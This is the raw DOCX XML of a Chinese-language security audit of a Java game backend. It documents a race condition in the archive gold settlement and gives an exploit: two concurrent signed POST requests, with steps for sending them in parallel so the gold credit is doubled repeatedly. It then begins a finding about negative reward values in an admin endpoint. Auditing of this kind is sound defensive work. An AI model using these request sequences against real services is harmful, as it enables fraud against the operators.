              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    User user = userRepository.findById(userId)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(() -&gt; new IllegalArgumentException("用户不存在"));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↑ 普通 SELECT（无 FOR UPDATE），lastArchiveTime 与 currentTotalHashRate 均未加行锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 并发事务 T1、T2 均在此处读到相同的旧 lastArchiveTime = T₀</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    LocalDateTime now = LocalDateTime.now();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    settleArchiveGoldNew(userId, user, now); // ← 传入同一旧 user 副本，T1/T2 计算出相同 goldToAdd</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    user.setLastArchiveTime(now); // ← 事务末尾才写回，此前整个事务窗口内 lastArchiveTime 无保护</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userRepository.save(user);   // ← T2 在 T1 提交后仍用旧副本，不受影响</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 黄金结算：ArchiveService.java # settleArchiveGoldNew</w:t>
              <w:br/>
              <w:t>private void settleArchiveGoldNew(Long userId, User user, LocalDateTime now) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    LocalDateTime lastArchive = user.getLastArchiveTime(); // ← 取自内存副本（T₀），T1/T2 均为同一旧值</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal oldHashRate = user.getCurrentTotalHashRate() != null</w:t>
              <w:br/>
              <w:t xml:space="preserve">            ? user.getCurrentTotalHashRate() : BigDecimal.ZERO; // ← 同理，取旧算力</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    long seconds = ChronoUnit.SECONDS.between(lastArchi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ve, now); // ← T1、T2 计算出相同 seconds</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (seconds &lt;= 0) return;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    seconds = Math.min(seconds, resolveArchiveGoldMaxSeconds());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal goldToAdd = oldHashRate.multiply(BigDecimal.valueOf(seconds)); // ← 两个事务得到相同 goldToAdd</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    userAccountRepository.findByUserIdForUpdate(userId).ifPresent(account -&gt; {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        // ↑ FOR UPDATE 只锁账户行，保证写入串行，但无法阻止 T2 用旧 lastArchiveTime 重算相同 goldToAdd</w:t>
              <w:br/>
              <w:t xml:space="preserve">        BigDecimal cur = account.getGoldBalance() != null ? account.getGoldBalance() : BigDecimal.ZERO;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        account.setGoldBalance(cur.add(goldToAdd)); // ← T1 写完后 T2 再写一次相同增量 → 余额翻倍</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userAccountRepository.save(account);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需同时（并发）发出以下两个请求，nonce 不同即可各自通过签名校验：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1</w:t>
              <w:br/>
              <w:t>POST /api/game/archive HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;合法用户Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-Sign-AppKey: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Sign-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Sign-Nonce: &lt;nonce_1&gt;</w:t>
              <w:br/>
              <w:t>X-Sign-Signature: &lt;sig_1_for_this_body_and_nonce_1&gt;</w:t>
              <w:br/>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "slots": [</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId":1,"minerLevel":1,"charging":false},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId":2,"minerLevel":null},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId":3,"minerLevel":null},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId":4,"minerLevel":null},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId":5,"minerLevel":null},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId":6,"minerLevel":null},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId":7,"minerLevel":null},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId":8,"minerLevel":null},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId":9,"minerLevel":null}</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ],</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "storage": []</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>### 请求 2（与请求 1 并发发送，仅 nonce 和签名不同，请求体相同）</w:t>
              <w:br/>
              <w:t>POST /api/game/archive HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;合法用户Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-Sign-AppKey: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Sign-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Sign-Nonce: &lt;nonce_2&gt;</w:t>
              <w:br/>
              <w:t>X-Sign-Signature: &lt;sig_2_for_this_body_and_nonce_2&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{ ... 同上 ... }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者以普通用户身份登录，获取有效 Token，并确保账户中已有矿机（使 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalHashRate &gt; 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）且距上次存档有一段时间（使 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>seconds &gt; 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，黄金结算不为零）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="235"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>准备两个请求包，请求体相同（合法的 9 格 slots 布局），但各自使用不同的 nonce（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>nonce_1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>nonce_2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）并分别计算对应签名。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="236"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">使用并发工具（如 Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>threading</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">、curl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>--parallel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">、Burp Suite Intruder 并发模式）在极短时间差内（理想情况同一毫秒）同时投递两个请求，确保两个事务在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userRepository.findById</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 执行后、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userRepository.save(user)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 提交前均已读取到相同的旧 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastArchiveTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>两个事务均通过签名校验（不同 nonce 均被 Redis 消耗成功）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="238"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两个事务先后获得账户行 FOR UPDATE 锁，各自将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>goldToAdd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 加入余额。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="239"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">预期结果：本轮应结算的黄金增量 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>goldToAdd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>记入两次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，黄金余额超出预期一倍。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">重复上述步骤可持续翻倍收益，只需每次存档前等待足够时间让 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>seconds &gt; 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 即可再次触发。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="241"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是否需要登录：是</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="242"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">权限级别：普通已登录用户，无需任何特权角色；需拥有至少一台矿机并已有过至少一次存档记录（以使 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastArchiveTime != null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 且 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalHashRate &gt; 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; 📎 该 sink 另有 3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受影响调用链（4 条）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="243"/>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UserMiner.java.setStatus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="244"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ArchiveController.java.archive → ArchiveService.java.saveArchiveNew → ArchiveService.java.rearrangeMinersNew → UserMiner.java.setIsCharged</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="245"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ArchiveController.java.archive → ArchiveService.java.saveArchiveNew → UserMinerRepository.java.findByUserId</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ArchiveController.java.archive → ArchiveService.java.saveArchiveNew → User.java.setLastMiningAt</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audit_m058_305_archive_ctrl-path13of25.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m058_319_archive_ctrl-path14of25.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m058_422_archive_ctrl-path22of25.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m058_456_archive_ctrl-path24of25.md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：GameValueManageService.java#batchUpdateLevelRewards</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_12" w:id="12"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞11：批量更新奖励接口缺少正值校验，可设置负数奖励导致玩家资产系统性损失</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="247"/>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：批量更新奖励接口绕过正值校验，负数奖励导致玩家资产被批量扣除</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="248"/>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src/main/java/com/gameBack/mjservice/service/GameValueManageService.java:batchUpdateLevelRewards</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="249"/>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：业务逻辑漏洞 / 输入校验不一致</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="250"/>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51"/>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：管理员（需 Admin 认证）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batchUpdateLevelRewards</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法在对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>goldReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>powerRewardPercent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>minerReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等奖励字段执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>更新（existing 非空）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>新建（existing 为空且有同类型缺失）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
